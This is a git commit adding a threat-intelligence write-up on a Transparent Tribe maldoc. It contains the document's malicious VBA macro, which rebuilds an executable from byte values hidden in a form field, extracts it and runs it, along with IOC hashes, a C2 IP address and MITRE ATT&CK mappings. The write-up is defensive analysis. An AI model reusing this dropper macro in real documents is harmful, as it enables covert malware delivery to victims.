Create analysis.md
This commit is contained in:
parent
18df65a92c
commit
d3bb0b7bfd
104
Pakistan/APT/Transparent Tribe/22-01-20/analysis.md
Normal file
104
Pakistan/APT/Transparent Tribe/22-01-20/analysis.md
Normal file
@ -0,0 +1,104 @@
|
||||
# Not as so transparent
|
||||
## Table of Contents
|
||||
* [Malware analysis](#Malware-analysis)
|
||||
* [Threat Intelligence](#Intel)
|
||||
* [Cyber kill chain](#Cyber-kill-chain)
|
||||
* [Indicators Of Compromise (IOC)](#IOC)
|
||||
* [Yara Rules](#Yara)
|
||||
* [References MITRE ATT&CK Matrix](#Ref-MITRE-ATTACK)
|
||||
* [Knowledge Graph](#Knowledge)
|
||||
* [Links](#Links)
|
||||
+ [Original Tweet](#tweet)
|
||||
+ [Link Anyrun](#Links-Anyrun)
|
||||
+ [Ressources](#Ressources)
|
||||
|
||||
<h2>Malware analysis <a name="Malware-analysis"></a></h2>
|
||||
<h6>The initial vector is a maldoc called ```"Criteria of Army Officers.doc" ```, this use a macro for extract and execute the PE file depends on the version of the operating system </h6>
|
||||
|
||||
```vb
|
||||
Sub unMoferzip(Fname As Variant, FileNameFolder As Variant)
|
||||
Dim FSO As Object
|
||||
Dim oApp As Object
|
||||
'Extract the files into the Destination folder
|
||||
Set oApp = CreateObject("Shell.Application")
|
||||
oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, &H4
|
||||
End Sub
|
||||
Sub MoferfileLdr()
|
||||
Dim path_Mofer_file As String
|
||||
Dim file_Mofer_name As String
|
||||
Dim zip_Mofer_file As Variant
|
||||
Dim fldr_Mofer_name As Variant
|
||||
file_Mofer_name = "ulhtagnias"
|
||||
fldr_Mofer_name = Environ$("ALLUSERSPROFILE") & "\DeIA-WIR\"
|
||||
If Dir(fldr_Mofer_name, vbDirectory) = "" Then
|
||||
MkDir (fldr_Mofer_name)
|
||||
End If
|
||||
zip_Mofer_file = fldr_Mofer_name & file_Mofer_name & ".zip"
|
||||
path_Mofer_file = fldr_Mofer_name & file_Mofer_name & ".exe"
|
||||
Dim ar1Mofer() As String
|
||||
Dim btsMofer() As Byte
|
||||
If InStr(Application.System.Version, "6.2") > 0 Or InStr(Application.System.Version, "6.3") > 0 Then
|
||||
ar1Mofer = Split(UserForm1.TextBox2.Text, "'")
|
||||
Else
|
||||
ar1Mofer = Split(UserForm1.TextBox1.Text, "'")
|
||||
End If
|
||||
Dim linMofer As Double
|
||||
linMofer = 0
|
||||
For Each vl In ar1Mofer
|
||||
ReDim Preserve btsMofer(linMofer)
|
||||
btsMofer(linMofer) = CByte(vl)
|
||||
linMofer = linMofer + 1
|
||||
Next
|
||||
Open zip_Mofer_file For Binary Access Write As #2
|
||||
Put #2, , btsMofer
|
||||
Close #2
|
||||
If Len(Dir(path_Mofer_file)) = 0 Then
|
||||
Call unMoferzip(zip_Mofer_file, fldr_Mofer_name)
|
||||
End If
|
||||
Shell path_Mofer_file, vbNormalNoFocus
|
||||
End Sub
|
||||
```
|
||||
|
||||
<h2>Threat Intelligence</h2><a name="Intel"></a></h2>
|
||||
<h2> Cyber kill chain <a name="Cyber-kill-chain"></a></h2>
|
||||
|
||||
<h2> Indicators Of Compromise (IOC) <a name="IOC"></a></h2>
|
||||
<h6> List of all the Indicators Of Compromise (IOC)</h6>
|
||||
|
||||
|Indicator|Description|
|
||||
| ------------- |:-------------:|
|
||||
|Criteria of Army Officers.doc|1cb726eab6f36af73e6b0ed97223d8f063f8209d2c25bed39f010b4043b2b8a1|
|
||||
|ulhtagnias.exe|d2c46e066ff7802cecfcb7cf3bab16e63827c326b051dc61452b896a673a6e67|
|
||||
|198.46.177.73|IP C2|
|
||||
|
||||
<h6> The IOC can be exported in <a href="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Pakistan/APT/Transparent%20Tribe/22-01-20/json/ioc.json">JSON</a></h6>
|
||||
|
||||
<h2> References MITRE ATT&CK Matrix <a name="Ref-MITRE-ATTACK"></a></h2>
|
||||
|
||||
|Enterprise tactics|Technics used|Ref URL|
|
||||
| :---------------: |:-------------| :------------- |
|
||||
|Discovery|Query Registry|https://attack.mitre.org/techniques/T1012/|
|
||||
|C&C|Uncommonly Used Port|https://attack.mitre.org/techniques/T1065/|
|
||||
|Defense Evasion|Scripting|https://attack.mitre.org/techniques/T1064/|
|
||||
|Execution|Scripting|https://attack.mitre.org/techniques/T1064/|
|
||||
|
||||
<h6> This can be exported as JSON format <a href="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Pakistan/APT/Transparent%20Tribe/22-01-20/json/Mitre-APT36-22-01-20.json">Export in JSON</a></h6>
|
||||
<h2>Yara Rules<a name="Yara"></a></h2>
|
||||
<h6> A list of YARA Rule is available <a href="">here</a></h6>
|
||||
<h2>Knowledge Graph<a name="Knowledge"></a></h2><a name="Know"></a>
|
||||
<h6>The following diagram shows the relationships of the techniques used by the groups and their corresponding malware:</h6>
|
||||
<p align="center">
|
||||
<img src="">
|
||||
</p>
|
||||
<h2>Links <a name="Links"></a></h2>
|
||||
<h6> Original tweet: </h6><a name="tweet"></a>
|
||||
|
||||
* [https://twitter.com/Arkbird_SOLG/status/1219769450989334528](https://twitter.com/Arkbird_SOLG/status/1219769450989334528)
|
||||
|
||||
<h6> Links Anyrun: <a name="Links-Anyrun"></a></h6>
|
||||
|
||||
* [Criteria of Army Officers.doc](https://app.any.run/tasks/de93d3a4-9ff0-4bed-b492-1f45214a0443)
|
||||
|
||||
<h6> Resources : </h6><a name="Ressources"></a>
|
||||
|
||||
* [Operation Transparent Tribe - APT Targeting Indian Diplomatic and Military Interests](https://www.proofpoint.com/us/threat-insight/post/Operation-Transparent-Tribe)
|
Loading…
Reference in New Issue
Block a user